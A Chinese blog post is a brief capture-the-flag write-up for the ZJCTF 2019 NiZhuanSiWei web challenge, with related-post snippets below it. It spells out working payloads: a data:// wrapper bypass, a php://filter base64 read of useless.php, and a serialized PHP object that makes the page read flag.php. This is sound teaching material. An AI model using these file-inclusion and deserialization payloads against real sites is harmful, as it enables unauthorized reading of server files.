[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2023-11-29 17:02:20 发布
最新推荐文章于 2023-11-29 17:02:20 发布
阅读量1.6k 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43152809/article/details/108913799
版权

[ZJCTF 2019]NiZhuanSiWei

打开主界面就是这个亚子
在这里插入图片描述
传入一个文件文件内容为 welcome to the zjctf
可以使用php伪协议或者data伪协议

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

绕过了第一层
随后,下面包含了一个文件,利用php伪协议查看一下useless.php的内容

file=php://filter/read=convert.base64-encode/resource=useless.php

在这里插入图片描述
输入以后,出现内容
在这里插入图片描述
将内容解码
在这里插入图片描述
随后将password进行序列化
在这里插入图片描述
在这里插入图片描述
随后输入

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述
查看页面源代码发现flag
在这里插入图片描述
参考链接:
https://www.cnblogs.com/gaonuoqi/p/12255777.html

aur03a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3905
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
关闭透明大页的原因及方法
qq_20408423的博客
11-29 8183
Oracle Rac关闭透明大页的原因及方法 Oracle Rac:关闭透明大页的原因及方法 【前言】在 Oracle 安装之前的准备工作中,有一项必须的工作是:禁用透明巨页(Disabling Transparent HugePages)。 那问题来了:为什么要关闭透明大页? 以及怎么进行禁用? 先来看下比较权威的介绍: https://blogs.oracle.com/linux/post/performance-issues-with-transparent-huge-pages-thp 划重点:
mongo登录后报错解决方案;WARNING: /sys/kernel/mm/transparent_hugepage/enabled is ‘always‘
Lcongming的博客
10-18 1927
WARNING: /sys/kernel/mm/transparent_hugepage/enabled is ‘always’ We suggest setting it to ‘never’ WARNING: /sys/kernel/mm/transparent_hugepage/defrag is ‘always’. We suggest setting it to ‘never’ 根据提示 在/sys/kernel/mm/transparent_hugepage/下 两个选项进行修改 .
Linux之关闭大页【即关闭透明大页】
xukang77的博客
07-01 4201
关闭透明大页
Linux7检查或关闭transparent_hugepage(透明大页)
wanghailan1818的博客
05-14 1758
检查当前的transparent_hugepage状态(以下为开启状态)
Disable Transparent Huge Pages禁用透明大页面-数据
不积跬步,无以至千里;不积小流,无以成江海。
06-07 1277
禁用Transparent Huge Pages(THP)可以帮助改善系统的性能和稳定性。这些功能在 Linux 操作系统中可用。要禁用 THP,请执行以下步骤:如果输出结果为,则 THP 已经开启;如果输出结果为,则 THP 已经禁用。这将修改配置文件并立即禁用 THP。在这将在系统启动时自动应用设置,确保 THP 一直禁用。请注意,这些步骤可能因为 Linux 的版本和发行版而有所不同。在实施之前,请先确认您的系统是否支持 THP,并确保已备份必要的配置文件和数据。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Linux HugePage
lingshengxiyou的博客
04-17 1675
使用AMM的情况下,所有的SGA 内存都是在/dev/shm 下分配的,因此在分配SGA时不会使用HugePage。这也是AMM 与HugePage不兼容的原因。HugePages_Surp: “surplus”的缩写形式,表示池中大于/proc/sys/vm/nr_hugepages 中值的 HugePages 数量。HugePages_Free – HugePages_Rsvd 这部分是没有被使用到的内存,如果没有其他的oracle instance,这部分内存也许永远都不会被使用到,也就是被浪费了。
Mongodb 启动报错:"/sys/kernel/mm/transparent_hugepage/enabled is 'always'"
qq_36264795的博客
07-31 4770
Distributor ID: CentOS Description: CentOS release 6.7 (Final) Release: 6.7 Codename: Final 问题描述 在系统上安装mongodb之后报错。 (安装教程地址: https://docs.mongodb.com/master/tutorial/install-mongodb-on-red-h...
Linux 关闭透明大页(transparent_hugepage)和 NUMA
任我行的博客
11-07 1061
有些情况下需要关闭Linux 服务器的 透明大页和 NUMA,比如安装 Oracle 数据库!
透明大页相关内核参数_Transparent HugePages(透明大页)
weixin_39929566的博客
12-20 266
Transparent HugePages(透明大页)1. 介绍从RedHat6, RedHat7, OL6, OL7 SLES11 and UEK2 kernels开始,透明大页默认是被开启的以便去改善操作系统的内存管理。透明大页与之前版本的传统意义上的HugePages是类似的,最主要的区别在于透明大页是可以在操作系统运行过程中动态设置的然而传统的hugepages是需要重启操作系统才能生效。...
操作系统关闭透明大页指南
qq_40349881的博客
04-01 4506
引言 Oracle数据库是一个很吃内存的软件,生产环境安装数据库后需要开启大页来管理数据库内存的使用。同时需要关闭操作系统的透明大页,为什么要关闭透明大页呢? 由于透明大页已知会导致意外的节点重新启动并导致rac出现性能问题。因此oracle强烈建议禁用透明页。及时在单实例环境中透明大页也会导致性能问题,所以oracle 建议关闭操作系统上的透明大页。 现提供禁用方式,此次测试环境为redhat7.6,与其他版本略有不同,亲测有效 方法1 查看透明大页是否有值 [oracle@rhapp2 ~]$ cat
银河麒麟高级服务器操作系统V10SP2(X86)开启,关闭和设置透明大页(transparent_hugepage)
最新发布
weixin_45754407的博客
11-29 2921
银河麒麟高级服务器操作系统V10SP2(X86)开启,关闭和设置透明大页(transparent_hugepage)
Linux系统&Hadoop集群性能调优:禁用 Transparent Huge Pages
不是巴菲特
09-23 311
# 查看进程 cat /sys/kernel/mm/transparent_hugepage/enabled # 关闭进程 echo never > /sys/kernel/mm/transparent_hugepage/enabled echo never > /sys/kernel/mm/transparent_hugepage/defrag # 再次查看进程 cat /sys/kernel/mm/transparent_hugepage/enabled 操作...
魔术方法总结
梦里不知身是客
12-26 9850
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
服务器内存插错通道影响,内存千万不能这样用:用错一半的性能就没了
weixin_42363231的博客
08-03 1996
原标题:内存千万不能这样用:用错一半的性能就没了视频: 超简单的孔明灯制作方法曾经有不到200元的8GB内存放在面前,可我没有珍惜,如今,面对直线上升的内存售价,小狮子真心知道自己错了……遗憾、后悔、感叹,这些情感都挽不回失去的低价内存了,再来一次的机会不知道在哪儿,可当下,使用好已经购买的内存才是最靠谱的!短期涨价带来的混乱内存售价在短期内出现飙升已经是默认的了,可不断提升(疯狂的时候近乎每天1...
web buuctf [ZJCTF 2019]NiZhuanSiWei1
weixin_44214568的博客
03-14 1275
一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 , php伪协议是基于文件包含的,文件包含有本地包含和远程包含, 当包含的文件在远程服务器上时,就形成了远程文件包含。 远程文件包含需要在 php.ini 中设置: allow_url_include = on(是否允许 include/require 远程文件) allow_url_fopen = on(是否允许打开远程文件) php伪协议是php支持的协议和封装协议 贴(我从...
[ZJCTF 2019]NiZhuanSiWei 1
m0_62879498的博客
04-27 575
[ZJCTF 2019]NiZhuanSiWei 1 进入环境,得到源代码 观察源代码,发现: 我们需要绕过两个点 首先是 get传参 ,让text=welcome to the zjctf 在这里我们需要用到 php的伪协议 data:// data:// — 数据流读写 条件:allow_url_fopen=on;allow_url_include=on 作用:作为一个封装器对进行数据流读写 使用格式:data://text/plain,[code] eg: data://text/plain,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值